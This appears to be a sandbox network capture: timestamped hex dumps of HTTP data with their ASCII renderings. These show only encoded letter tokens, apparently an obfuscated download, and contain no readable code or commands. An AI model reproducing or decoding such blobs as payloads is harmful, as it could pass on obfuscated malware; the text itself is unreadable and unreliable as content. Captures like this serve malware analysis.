                                                                                                Data Ascii: OS TSP MSP TTM PM iU p TU Ui TTi TTn TSO Pi iU MTp ip Tii Ui TTp TTn pT Ui PS iU PS Pi UM TSp Tgi TTO Mg PS Pi PS OS TTM TTi TTn TSO TTM TTp PS TnP iM TOP TTi TTP TSO MgM MM iU PS Pi Ui PM TTO Tng TSU Tni iU Pg Pi MMi Up TTn TSO TTM PS TnO PS PO ng MTS TT
                                                                                                2021-10-26 15:34:19 UTC176INData Raw: 54 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 67 20 55 69 20 50 4d 20 54 54 55 20 4d 67 50 20 55 4d 20 4d 53 69 20 69 55 20 54 4d 54 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 50 20 50 53 20 54 54 55 20 69 4f 20 4d 69 70 20 54 54 55 20 4d 67 4f 20 54 54 70 20 67 67 20 54 54 4d 20 67 53 20 50 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 50 20 54 54 6e 20 54 67 54 20 69 53 20 54 67 6e 20 50 54 20 54 4d 67 20 55 69 20 54 55 20 70 69 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 55 69 20 50 67 20 54 53 55 20 70 70 20 4d 53 4d 20 54 53 55 20 70 4d 20 50 53 20 4d 69 55 20 6e 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 20 54 54 50 20 6e 50 20 53 20 4d 69 6e 20 50 50 20 69 20 54 54 69 20 4d 4f 20 4f 54 20 54 54 4d 20 50
                                                                                                Data Ascii: T TSO TTM PS iU PS Pg Ui PM TTU MgP UM MSi iU TMT Pi Ui TTi TTn TSO TTP PS TTU iO Mip TTU MgO TTp gg TTM gS P PS Pi Ui TTi TTP TTn TgT iS Tgn PT TMg Ui TU pi TSO TTM PS iU Ui Pg TSU pp MSM TSU pM PS MiU n Pi Ui TTi TTn TT TTP nP S Min PP i TTi MO OT TTM P
                                                                                                2021-10-26 15:34:19 UTC180INData Raw: 70 20 67 4f 20 54 55 4d 20 69 55 20 54 55 53 20 50 53 20 54 4d 70 20 50 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 67 70 20 69 55 20 67 50 20 54 4d 50 20 54 67 54 20 54 54 4d 20 4d 69 53 20 54 53 4f 20 4f 4d 20 55 54 20 69 55 20 50 53 20 50 69 20 55 69 20 54 53 53 20 54 54 6e 20 4d 53 20 50 4f 20 4d 69 69 20 50 53 20 54 55 54 20 50 69 20 54 70 53 20 54 6e 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 67 55 20 50 53 20 4d 69 67 20 67 54 20 54 4f 54 20 54 54 4f 20 4d 4d 4f 20 54 54 4d 20 70 20 55 69 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 53 53 20 54 53 4f 20 4f 67 20 54 4d 70 20 70 69 20 69 55 20 54 55 55 20 55 69 20 6e 69 20 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 67 50 20 50 69 20 69 50 20 70 4d 20 50 20 54 54 54 20 4d 50 54
                                                                                                Data Ascii: p gO TUM iU TUS PS TMp Pi TTi TTn TSO TTM gp iU gP TMP TgT TTM MiS TSO OM UT iU PS Pi Ui TSS TTn MS PO Mii PS TUT Pi TpS Tn TTn TSO TTM PS gU PS Mig gT TOT TTO MMO TTM p Ui PS Pi Ui TTi TSS TSO Og TMp pi iU TUU Ui ni Tn TSO TTM PS iU gP Pi iP pM P TTT MPT
                                                                                                2021-10-26 15:34:19 UTC184INData Raw: 54 50 6e 20 4d 67 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 54 55 67 20 55 69 20 67 50 20 4d 55 20 54 53 20 54 54 4d 20 50 69 20 69 4f 20 54 4f 69 20 54 55 53 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 4d 69 54 20 50 53 20 54 6e 6e 20 4f 54 20 54 6e 69 20 55 50 20 54 54 55 20 54 54 70 20 4f 20 4d 69 67 20 50 53 20 69 55 20 50 53 20 50 69 20 4d 54 53 20 54 54 69 20 54 69 55 20 69 20 4d 67 20 50 53 20 50 67 20 50 54 20 54 50 55 20 4d 54 50 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 54 55 53 20 69 55 20 67 50 20 4f 4d 20 67 53 20 54 54 55 20 54 54 4d 20 54 53 55 20 54 53 55 20 54 55 4d 20 69 55 20 50 53 20 50 69 20 55 69 20 4d 69 69 20 54 53 4f 20 54 50 55 20 54 53 70 20 55 50 20 69 55 20 50 4d 20 50 50 20 54 70 20 4d 69 70 20 54 54 6e 20 54
                                                                                                Data Ascii: TPn MgO TTM PS iU PS TUg Ui gP MU TS TTM Pi iO TOi TUS Ui TTi TTn TSO MiT PS Tnn OT Tni UP TTU TTp O Mig PS iU PS Pi MTS TTi TiU i Mg PS Pg PT TPU MTP TTi TTn TSO TTM TUS iU gP OM gS TTU TTM TSU TSU TUM iU PS Pi Ui Mii TSO TPU TSp UP iU PM PP Tp Mip TTn T
                                                                                                2021-10-26 15:34:19 UTC188INData Raw: 20 55 50 20 54 6e 69 20 4d 4d 53 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 67 50 20 50 69 20 55 54 20 4d 69 53 20 6e 4f 20 54 53 69 20 6e 67 20 50 54 20 54 53 53 20 54 50 4d 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 53 69 20 50 55 20 69 4d 20 54 54 55 20 50 69 20 54 54 53 20 54 54 50 20 54 67 20 54 4f 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 67 4d 20 55 69 20 54 67 54 20 4d 69 6e 20 67 6e 20 54 54 6e 20 55 20 69 4f 20 54 53 20 54 50 6e 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 53 4d 20 50 53 20 55 54 20 54 6e 6e 20 54 54 53 20 55 54 20 6e 4f 20 54 54 70 20 4f 20 4d 54 4f 20 50 53 20 69 55 20 50 53 20 50 69 20 70 70 20 54 54 69 20 4d 67 70 20 4d 67 55 20 69 70 20 50 50 20 54 69 20 50 54 20 54 6e 55 20 4d 50 50 20 54 54 69
                                                                                                Data Ascii: UP Tni MMS TSO TTM PS iU gP Pi UT MiS nO TSi ng PT TSS TPM Pi Ui TTi TTn TMi TSi PU iM TTU Pi TTS TTP Tg TOO TTM PS iU PS gM Ui TgT Min gn TTn U iO TS TPn Ui TTi TTn TSO TSM PS UT Tnn TTS UT nO TTp O MTO PS iU PS Pi pp TTi Mgp MgU ip PP Ti PT TnU MPP TTi
                                                                                                2021-10-26 15:34:19 UTC192INData Raw: 50 4d 20 54 70 53 20 50 54 20 54 67 53 20 54 50 54 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 4d 20 69 53 20 54 4f 67 20 69 69 20 50 54 20 54 54 69 20 4d 67 54 20 54 53 55 20 54 70 53 20 4d 69 54 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 70 20 54 4d 50 20 54 4d 4f 20 4d 67 6e 20 55 50 20 69 55 20 54 70 53 20 50 50 20 55 69 20 54 55 4d 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 50 69 20 50 55 20 4d 53 6e 20 4d 53 54 20 4d 67 4f 20 54 54 70 20 4d 50 50 20 54 54 67 20 50 53 20 69 55 20 50 53 20 50 69 20 55 6e 20 54 54 69 20 54 54 50 20 54 54 6e 20 54 67 54 20 69 53 20 4d 4d 4d 20 50 53 20 54 70 50 20 55 50 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 69 4f 20 69 55 20 54 54 70 20 50 67 20 54 6e 53 20 55 67 20 54 6e 55 20 54 53 6e 20
                                                                                                Data Ascii: PM TpS PT TgS TPT TTi TTn TSO TTM PM iS TOg ii PT TTi MgT TSU TpS MiT iU PS Pi Ui TTp TMP TMO Mgn UP iU TpS PP Ui TUM TTn TSO TTM PS Pi PU MSn MST MgO TTp MPP TTg PS iU PS Pi Un TTi TTP TTn TgT iS MMM PS TpP UP TTi TTn TSO TTM iO iU TTp Pg TnS Ug TnU TSn
                                                                                                2021-10-26 15:34:19 UTC196INData Raw: 50 53 20 50 53 20 50 53 20 54 54 4f 20 67 53 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 4d 20 54 4f 54 20 54 4d 4d 20 50 53 20 50 69 20 55 70 20 54 54 69 20 4d 4d 53 20 67 4f 20 54 54 4d 20 50 53 20 69 4f 20 50 53 20 54 4f 50 20 67 53 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 4d 20 54 54 50 20 54 4d 67 20 50 53 20 50 69 20 55 70 20 54 54 69 20 69 53 20 67 55 20 54 54 4d 20 50 53 20 69 4f 20 50 53 20 54 50 4f 20 67 54 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 4d 20 54 4f 4f 20 54 4d 67 20 50 53 20 50 69 20 55 70 20 54 54 69 20 54 53 53 20 67 67 20 54 54 4d 20 50 53 20 69 4f 20 50 53 20 54 53 6e 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 4d 20 54 50 50 20 54 4d 69 20 50 53 20 50 69 20 55 50 20 54 54 69 20 54 4d 55 20 67 67 20 54 54 4d 20
                                                                                                Data Ascii: PS PS PS TTO gS TTi TTn TSU TTM TOT TMM PS Pi Up TTi MMS gO TTM PS iO PS TOP gS TTi TTn TSU TTM TTP TMg PS Pi Up TTi iS gU TTM PS iO PS TPO gT TTi TTn TSU TTM TOO TMg PS Pi Up TTi TSS gg TTM PS iO PS TSn Mi TTi TTn TSU TTM TPP TMi PS Pi UP TTi TMU gg TTM
                                                                                                2021-10-26 15:34:19 UTC201INData Raw: 20 54 54 4d 20 50 53 20 69 4f 20 50 53 20 4d 54 53 20 4d 54 70 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 4d 20 4d 20 54 55 4f 20 50 53 20 50 69 20 55 50 20 54 54 69 20 4d 4f 20 4d 4d 69 20 54 54 4d 20 50 53 20 69 4f 20 50 53 20 54 67 53 20 4d 54 6e 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 4d 20 50 53 20 54 4f 53 20 50 53 20 50 69 20 55 50 20 54 54 69 20 50 6e 20 4d 4d 6e 20 54 54 4d 20 50 53 20 69 4f 20 50 53 20 54 6e 69 20 4d 54 55 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 4d 20 4d 54 69 20 54 4f 53 20 50 53 20 50 69 20 55 50 20 54 54 69 20 70 4f 20 4d 4d 70 20 54 54 4d 20 50 53 20 69 4f 20 50 53 20 6e 69 20 4d 54 4f 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 4d 20 4d 50 53 20 54 4f 54 20 50 53 20 50 69 20 55 50 20 54 54 69 20 4f 6e 20 4d 50
                                                                                                Data Ascii: TTM PS iO PS MTS MTp TTi TTn TSU TTM M TUO PS Pi UP TTi MO MMi TTM PS iO PS TgS MTn TTi TTn TSU TTM PS TOS PS Pi UP TTi Pn MMn TTM PS iO PS Tni MTU TTi TTn TSU TTM MTi TOS PS Pi UP TTi pO MMp TTM PS iO PS ni MTO TTi TTn TSU TTM MPS TOT PS Pi UP TTi On MP
                                                                                                2021-10-26 15:34:19 UTC205INData Raw: 53 20 55 67 20 50 53 20 4d 50 50 20 55 69 20 54 69 53 20 4d 4d 54 20 50 55 20 54 4d 54 20 4d 67 50 20 69 55 20 54 4f 67 20 69 69 20 55 54 20 54 54 50 20 70 55 20 54 53 6e 20 54 4d 50 20 54 50 50 20 4f 20 50 54 20 4d 67 4f 20 55 54 20 54 54 53 20 4d 4d 53 20 4d 70 20 54 4d 54 20 4f 54 20 69 4f 20 4d 55 20 54 50 4f 20 54 4f 50 20 54 54 69 20 50 4d 20 54 53 4f 20 6e 69 20 54 50 50 20 54 6e 70 20 50 4f 20 6e 4f 20 55 70 20 54 4d 4f 20 54 54 54 20 54 53 69 20 54 54 67 20 4f 54 20 69 4f 20 54 4f 67 20 69 69 20 50 54 20 54 54 69 20 4d 55 20 54 53 55 20 70 53 20 54 50 50 20 54 55 67 20 50 4f 20 6e 20 55 69 20 67 69 20 4d 4d 53 20 4d 53 53 20 54 54 69 20 67 20 50 53 20 55 4d 20 54 50 4f 20 54 4f 55 20 54 4d 67 20 70 55 20 54 54 54 20 67 20 54 50 50 20 54 50 53 20
                                                                                                Data Ascii: S Ug PS MPP Ui TiS MMT PU TMT MgP iU TOg ii UT TTP pU TSn TMP TPP O PT MgO UT TTS MMS Mp TMT OT iO MU TPO TOP TTi PM TSO ni TPP Tnp PO nO Up TMO TTT TSi TTg OT iO TOg ii PT TTi MU TSU pS TPP TUg PO n Ui gi MMS MSS TTi g PS UM TPO TOU TMg pU TTT g TPP TPS
                                                                                                2021-10-26 15:34:19 UTC208INData Raw: 55 6e 20 50 53 20 70 67 20 55 54 20 54 6e 4f 20 4d 54 6e 20 67 4f 20 54 54 70 20 69 67 20 50 67 20 4d 69 55 20 54 50 69 20 70 54 20 54 54 70 20 54 53 55 20 54 53 69 20 54 70 54 20 54 50 55 20 55 4f 20 50 4d 20 69 6e 20 55 54 20 54 6e 54 20 4d 54 6e 20 4d 4d 20 54 4d 50 20 4d 53 67 20 50 4d 20 4d 54 4f 20 54 50 69 20 4d 54 67 20 54 4d 6e 20 54 54 70 20 54 54 53 20 54 67 54 20 69 53 20 54 70 53 20 70 67 20 50 50 20 55 6e 20 54 69 67 20 4d 54 6e 20 70 69 20 54 54 67 20 54 55 6e 20 50 67 20 54 4f 67 20 69 69 20 4d 53 53 20 54 4d 6e 20 4d 4d 55 20 54 53 69 20 54 4d 67 20 54 50 4f 20 54 69 55 20 70 67 20 67 54 20 55 4d 20 4f 4f 20 4d 54 70 20 54 20 54 54 69 20 4d 50 54 20 69 4f 20 54 4f 67 20 69 69 20 55 54 20 54 54 50 20 54 4d 69 20 54 54 54 20 55 69 20 54 50
                                                                                                Data Ascii: Un PS pg UT TnO MTn gO TTp ig Pg MiU TPi pT TTp TSU TSi TpT TPU UO PM in UT TnT MTn MM TMP MSg PM MTO TPi MTg TMn TTp TTS TgT iS TpS pg PP Un Tig MTn pi TTg TUn Pg TOg ii MSS TMn MMU TSi TMg TPO TiU pg gT UM OO MTp T TTi MPT iO TOg ii UT TTP TMi TTT Ui TP
                                                                                                2021-10-26 15:34:19 UTC212INData Raw: 69 20 54 55 67 20 55 70 20 4d 69 20 54 4f 70 20 54 54 6e 20 4f 4f 20 54 6e 4f 20 50 53 20 6e 53 20 54 67 50 20 54 55 20 54 54 55 20 4d 69 69 20 54 54 54 20 54 69 20 54 67 54 20 69 69 20 67 67 20 54 55 67 20 55 70 20 4d 50 54 20 54 4f 70 20 6e 6e 20 4f 4f 20 54 6e 4f 20 50 53 20 54 70 70 20 54 67 50 20 54 54 4d 20 4f 6e 20 4d 69 69 20 54 54 54 20 4d 67 4f 20 54 67 54 20 4d 4f 20 50 4d 20 4d 53 6e 20 55 50 20 54 4d 4f 20 54 54 54 20 70 4f 20 4f 4f 20 54 4f 50 20 69 4f 20 54 4f 67 20 69 69 20 54 4d 4d 20 4f 6e 20 54 53 55 20 54 53 6e 20 54 67 54 20 69 53 20 50 67 20 50 54 20 4d 54 50 20 55 70 20 4d 54 70 20 54 4f 70 20 54 54 53 20 54 54 70 20 4d 54 54 20 50 53 20 4d 69 50 20 54 50 70 20 55 6e 20 54 54 55 20 69 54 20 54 53 4f 20 67 70 20 54 50 67 20 55 6e 20
                                                                                                Data Ascii: i TUg Up Mi TOp TTn OO TnO PS nS TgP TU TTU Mii TTT Ti TgT ii gg TUg Up MPT TOp nn OO TnO PS Tpp TgP TTM On Mii TTT MgO TgT MO PM MSn UP TMO TTT pO OO TOP iO TOg ii TMM On TSU TSn TgT iS Pg PT MTP Up MTp TOp TTS TTp MTT PS MiP TPp Un TTU iT TSO gp TPg Un
                                                                                                2021-10-26 15:34:19 UTC228INData Raw: 20 4f 50 20 50 69 20 6e 20 54 20 55 20 54 54 4d 20 54 4d 6e 20 55 54 20 70 69 20 70 4f 20 70 53 20 54 4f 20 4d 50 20 54 53 4f 20 67 69 20 6e 54 20 4f 69 20 6e 53 20 4f 50 20 50 6e 20 4d 67 20 50 70 20 55 20 69 20 4f 53 20 4f 50 20 55 70 20 54 4d 70 20 50 67 20 4d 55 20 54 6e 20 54 20 4d 54 20 50 53 20 4f 55 20 6e 54 20 55 55 20 67 4d 20 4d 6e 20 4d 69 20 55 20 67 70 20 6e 50 20 70 69 20 55 6e 20 54 4d 70 20 50 67 20 4d 55 20 54 6e 20 54 20 4d 54 20 50 53 20 4f 4f 20 54 54 4d 20 6e 4f 20 67 4d 20 4d 67 20 54 54 6e 20 69 69 20 54 4f 20 55 6e 20 54 54 55 20 4f 69 20 55 6e 20 50 54 20 54 20 54 54 6e 20 70 4d 20 4f 20 70 50 20 70 55 20 55 6e 20 4f 54 20 54 4d 4d 20 67 67 20 54 70 20 54 69 20 50 20 70 69 20 55 4f 20 6e 53 20 6e 4f 20 54 4d 4d 20 50 54 20 4d 4d
                                                                                                Data Ascii: OP Pi n T U TTM TMn UT pi pO pS TO MP TSO gi nT Oi nS OP Pn Mg Pp U i OS OP Up TMp Pg MU Tn T MT PS OU nT UU gM Mn Mi U gp nP pi Un TMp Pg MU Tn T MT PS OO TTM nO gM Mg TTn ii TO Un TTU Oi Un PT T TTn pM O pP pU Un OT TMM gg Tp Ti P pi UO nS nO TMM PT MM
                                                                                                2021-10-26 15:34:19 UTC240INData Raw: 50 54 20 4d 53 20 67 20 67 4f 20 67 54 20 4f 53 20 54 53 70 20 4f 4d 20 54 4d 67 20 69 20 4d 4f 20 54 4f 20 4d 67 20 4d 69 20 4f 54 20 54 54 55 20 54 4d 53 20 4d 20 50 53 20 6e 53 20 54 4d 20 67 4d 20 50 50 20 54 4d 54 20 6e 20 54 53 4d 20 6e 53 20 67 70 20 70 55 20 54 67 20 54 53 20 6e 6e 20 50 53 20 54 4f 20 54 50 20 6e 54 20 50 69 20 69 67 20 50 4d 20 50 4d 20 50 53 20 55 67 20 54 4d 53 20 70 4f 20 55 50 20 54 6e 20 54 70 20 54 4f 20 4f 4d 20 50 54 20 55 67 20 6e 4d 20 55 55 20 54 54 4f 20 70 54 20 70 6e 20 4d 67 20 4d 70 20 6e 6e 20 54 50 20 69 55 20 54 6e 20 54 54 20 67 6e 20 67 20 67 4f 20 67 69 20 67 70 20 50 20 54 54 70 20 55 69 20 55 55 20 50 50 20 67 6e 20 70 70 20 67 53 20 69 20 70 69 20 55 55 20 54 53 69 20 70 69 20 67 70 20 70 70 20 4d 55 20
                                                                                                Data Ascii: PT MS g gO gT OS TSp OM TMg i MO TO Mg Mi OT TTU TMS M PS nS TM gM PP TMT n TSM nS gp pU Tg TS nn PS TO TP nT Pi ig PM PM PS Ug TMS pO UP Tn Tp TO OM PT Ug nM UU TTO pT pn Mg Mp nn TP iU Tn TT gn g gO gi gp P TTp Ui UU PP gn pp gS i pi UU TSi pi gp pp MU
                                                                                                2021-10-26 15:34:19 UTC256INData Raw: 67 20 54 54 70 20 4d 50 20 70 4d 20 6e 6e 20 4d 54 20 70 70 20 6e 69 20 70 55 20 55 6e 20 54 54 50 20 4d 4d 20 4d 6e 20 4d 50 20 67 69 20 4f 20 55 54 20 6e 54 20 54 50 20 54 54 20 55 69 20 55 54 20 6e 4d 20 4d 55 20 69 54 20 54 4d 6e 20 54 54 4f 20 54 53 70 20 6e 55 20 50 53 20 4d 53 20 4d 6e 20 55 20 69 6e 20 54 54 55 20 4f 4d 20 54 54 6e 20 69 20 67 4d 20 54 54 20 50 69 20 54 20 4d 50 20 54 53 67 20 6e 54 20 67 20 6e 20 54 53 4f 20 67 4d 20 67 6e 20 50 70 20 69 20 53 20 70 70 20 54 4d 53 20 70 70 20 4f 55 20 67 67 20 67 69 20 54 20 4d 54 20 54 53 4f 20 54 53 53 20 4f 55 20 4f 67 20 4d 4d 20 50 54 20 6e 4d 20 54 53 4f 20 55 67 20 54 50 20 70 50 20 54 53 54 20 55 54 20 69 55 20 6e 54 20 4d 55 20 6e 67 20 4d 20 54 54 4f 20 54 54 70 20 4d 20 55 55 20 54 6e
                                                                                                Data Ascii: g TTp MP pM nn MT pp ni pU Un TTP MM Mn MP gi O UT nT TP TT Ui UT nM MU iT TMn TTO TSp nU PS MS Mn U in TTU OM TTn i gM TT Pi T MP TSg nT g n TSO gM gn Pp i S pp TMS pp OU gg gi T MT TSO TSS OU Og MM PT nM TSO Ug TP pP TST UT iU nT MU ng M TTO TTp M UU Tn
                                                                                                2021-10-26 15:34:19 UTC272INData Raw: 20 55 20 4d 20 6e 54 20 54 54 6e 20 6e 55 20 4f 70 20 4d 70 20 67 50 20 69 67 20 69 4d 20 4f 70 20 55 6e 20 54 50 20 54 54 20 55 69 20 55 54 20 6e 4d 20 4d 55 20 4d 70 20 54 53 6e 20 55 6e 20 54 53 6e 20 4f 4f 20 4f 55 20 70 4d 20 4d 6e 20 4d 54 20 69 6e 20 54 53 54 20 54 20 4f 54 20 4f 67 20 4d 20 70 20 50 50 20 53 20 4d 70 20 4f 50 20 67 20 70 4f 20 54 54 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20 54 20 55 55 20 4f 4d 20 54 54 4d 20 54 4d 53 20 70 54 20 4d 70 20 67 4d 20 69 20 67 6e 20 54 4d 50 20 4d 20 4f 67 20 54 54 70 20 67 53 20 54 70 20 50 55 20 69 53 20 54 55 20 55 70 20 54 54 69 20 70 20 70 6e 20 54 53 55 20 54 53 20 4d 69 20 54 54 20 67 70 20 54 4d 70 20 4f 20 54 54 4f 20 54 53 67 20 54 53 67 20 50 54 20 69 55 20 69 67 20 54 6e 20 4d 4d 20 4f
                                                                                                Data Ascii: U M nT TTn nU Op Mp gP ig iM Op Un TP TT Ui UT nM MU Mp TSn Un TSn OO OU pM Mn MT in TST T OT Og M p PP S Mp OP g pO TT TSP TTi Up US T UU OM TTM TMS pT Mp gM i gn TMP M Og TTp gS Tp PU iS TU Up TTi p pn TSU TS Mi TT gp TMp O TTO TSg TSg PT iU ig Tn MM O
                                                                                                2021-10-26 15:34:19 UTC288INData Raw: 20 6e 20 4d 67 20 67 67 20 54 53 20 54 4d 4d 20 70 55 20 54 53 50 20 54 53 54 20 50 20 4d 53 20 4d 55 20 55 20 4f 6e 20 55 50 20 4f 55 20 54 69 20 4d 54 20 6e 4f 20 6e 4d 20 54 53 4f 20 55 67 20 54 50 20 70 50 20 54 53 70 20 54 4d 54 20 4f 70 20 50 54 20 6e 6e 20 6e 67 20 69 54 20 70 69 20 54 4d 70 20 54 53 4f 20 54 4d 54 20 50 4f 20 67 69 20 4d 4f 20 69 67 20 70 67 20 4f 4d 20 4d 53 20 54 4d 4d 20 4f 69 20 67 4d 20 4d 54 20 6e 4d 20 55 53 20 54 54 4d 20 54 6e 20 54 67 20 70 6e 20 70 50 20 54 53 4f 20 50 4d 20 67 4f 20 4f 54 20 70 6e 20 6e 4d 20 54 53 69 20 54 53 53 20 4f 4d 20 54 54 4d 20 4d 4f 20 4d 69 20 50 4f 20 67 53 20 70 4f 20 55 6e 20 4d 20 70 6e 20 54 53 67 20 70 4f 20 50 4d 20 55 53 20 6e 6e 20 50 53 20 54 4f 20 54 50 20 6e 54 20 67 20 4d 50 20
                                                                                                Data Ascii: n Mg gg TS TMM pU TSP TST P MS MU U On UP OU Ti MT nO nM TSO Ug TP pP TSp TMT Op PT nn ng iT pi TMp TSO TMT PO gi MO ig pg OM MS TMM Oi gM MT nM US TTM Tn Tg pn pP TSO PM gO OT pn nM TSi TSS OM TTM MO Mi PO gS pO Un M pn TSg pO PM US nn PS TO TP nT g MP
                                                                                                2021-10-26 15:34:19 UTC304INData Raw: 20 54 54 50 20 54 4d 4d 20 50 69 20 67 70 20 69 55 20 55 53 20 54 54 4d 20 54 6e 20 54 67 20 70 6e 20 6e 4f 20 4d 70 20 4d 54 20 70 4d 20 67 69 20 69 4f 20 54 20 55 4f 20 54 53 4d 20 54 54 54 20 67 69 20 50 6e 20 54 67 20 55 50 20 67 67 20 6e 53 20 54 54 69 20 4f 50 20 4f 67 20 54 70 20 69 4d 20 50 4d 20 55 53 20 6e 6e 20 50 53 20 54 4f 20 54 50 20 6e 54 20 67 67 20 70 54 20 70 70 20 50 70 20 4d 4f 20 70 55 20 54 4d 4d 20 70 20 54 53 53 20 4d 4d 20 6e 20 70 53 20 67 70 20 50 54 20 4f 53 20 4f 4f 20 4f 4d 20 70 20 70 4d 20 54 53 20 69 4d 20 67 4d 20 55 69 20 54 4d 4d 20 54 4d 69 20 70 20 70 55 20 4d 4d 20 6e 20 67 4f 20 4d 69 20 67 69 20 54 53 69 20 4f 69 20 54 4d 69 20 54 54 70 20 54 6e 20 70 67 20 4d 50 20 4d 4f 20 67 20 54 4d 53 20 6e 54 20 54 50 20 50
                                                                                                Data Ascii: TTP TMM Pi gp iU US TTM Tn Tg pn nO Mp MT pM gi iO T UO TSM TTT gi Pn Tg UP gg nS TTi OP Og Tp iM PM US nn PS TO TP nT gg pT pp Pp MO pU TMM p TSS MM n pS gp PT OS OO OM p pM TS iM gM Ui TMM TMi p pU MM n gO Mi gi TSi Oi TMi TTp Tn pg MP MO g TMS nT TP P
                                                                                                2021-10-26 15:34:19 UTC320INData Raw: 20 55 53 20 6e 6e 20 50 53 20 54 4f 20 54 50 20 6e 54 20 67 6e 20 50 4f 20 54 50 20 50 4f 20 69 53 20 54 4d 4d 20 55 4f 20 54 4d 69 20 70 6e 20 54 20 69 67 20 70 50 20 50 50 20 70 4d 20 4f 54 20 4f 4f 20 6e 69 20 4f 67 20 67 6e 20 50 50 20 50 53 20 70 53 20 6e 6e 20 54 50 20 69 55 20 54 6e 20 54 54 20 67 6e 20 70 53 20 67 70 20 50 50 20 4d 20 54 4d 53 20 55 6e 20 4f 50 20 54 53 55 20 67 50 20 4d 20 69 6e 20 50 20 69 6e 20 70 20 6e 67 20 70 69 20 70 70 20 50 67 20 4d 53 20 6e 70 20 69 4d 20 4d 67 20 54 50 20 54 67 20 50 53 20 4d 54 20 54 53 50 20 67 20 50 4f 20 54 69 20 70 69 20 54 4d 50 20 54 20 54 53 6e 20 54 54 67 20 67 50 20 67 67 20 70 50 20 67 50 20 4d 69 20 55 54 20 55 4d 20 54 54 4d 20 54 20 67 4f 20 4d 54 20 50 20 50 4f 20 4d 67 20 55 50 20 54 67
                                                                                                Data Ascii: US nn PS TO TP nT gn PO TP PO iS TMM UO TMi pn T ig pP PP pM OT OO ni Og gn PP PS pS nn TP iU Tn TT gn pS gp PP M TMS Un OP TSU gP M in P in p ng pi pp Pg MS np iM Mg TP Tg PS MT TSP g PO Ti pi TMP T TSn TTg gP gg pP gP Mi UT UM TTM T gO MT P PO Mg UP Tg
                                                                                                2021-10-26 15:34:19 UTC336INData Raw: 20 55 69 20 55 54 20 6e 4d 20 4d 55 20 50 70 20 55 55 20 4d 53 20 4f 55 20 54 4d 54 20 50 4f 20 55 70 20 70 6e 20 4d 4f 20 4d 6e 20 4f 53 20 54 53 67 20 54 4d 4d 20 4f 70 20 4d 67 20 6e 54 20 4d 4d 20 69 53 20 67 50 20 54 53 4f 20 4d 20 55 50 20 54 54 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20 54 20 54 53 4f 20 70 4f 20 6e 69 20 54 50 20 4d 55 20 70 4f 20 67 55 20 50 20 6e 54 20 55 67 20 4d 20 54 54 50 20 54 50 20 54 53 55 20 54 70 20 70 6e 20 70 53 20 50 53 20 54 53 20 4f 67 20 70 20 70 50 20 54 53 50 20 6e 4f 20 54 54 6e 20 6e 55 20 6e 6e 20 70 6e 20 55 69 20 4f 54 20 70 6e 20 4d 55 20 4d 55 20 54 55 20 50 4d 20 70 55 20 70 4f 20 55 50 20 55 55 20 4f 4f 20 67 4f 20 4d 54 20 50 54 20 50 4d 20 70 4f 20 6e 54 20 6e 20 54 54 67 20 70 70 20 50 20 6e 4f 20
                                                                                                Data Ascii: Ui UT nM MU Pp UU MS OU TMT PO Up pn MO Mn OS TSg TMM Op Mg nT MM iS gP TSO M UP TT TSP TTi Up US T TSO pO ni TP MU pO gU P nT Ug M TTP TP TSU Tp pn pS PS TS Og p pP TSP nO TTn nU nn pn Ui OT pn MU MU TU PM pU pO UP UU OO gO MT PT PM pO nT n TTg pp P nO
                                                                                                2021-10-26 15:34:19 UTC352INData Raw: 20 67 4d 20 4d 4f 20 6e 20 4d 53 20 54 54 4d 20 70 50 20 55 50 20 6e 53 20 54 53 50 20 4d 20 4d 67 20 6e 20 54 50 20 54 54 4d 20 4f 6e 20 70 55 20 55 67 20 70 55 20 67 4d 20 54 54 69 20 54 55 20 55 20 69 20 54 53 4f 20 54 53 54 20 54 53 4d 20 54 54 4d 20 54 53 55 20 54 54 69 20 50 53 20 55 20 69 20 4f 6e 20 70 55 20 70 69 20 4f 50 20 50 55 20 4d 54 20 54 54 6e 20 70 67 20 4d 54 20 70 70 20 4f 4d 20 55 67 20 55 50 20 69 4f 20 54 54 69 20 50 69 20 4d 20 67 53 20 55 54 20 55 54 20 6e 53 20 50 69 20 50 20 6e 20 54 70 20 4d 69 20 4d 54 20 54 53 67 20 70 6e 20 55 6e 20 70 55 20 67 20 4d 4f 20 6e 20 70 20 50 6e 20 6e 53 20 55 50 20 4f 50 20 50 69 20 4d 69 20 4d 4f 20 4d 4d 20 54 4d 20 4d 55 20 54 4d 6e 20 55 54 20 55 54 20 4f 69 20 70 54 20 4d 55 20 54 70 20 54
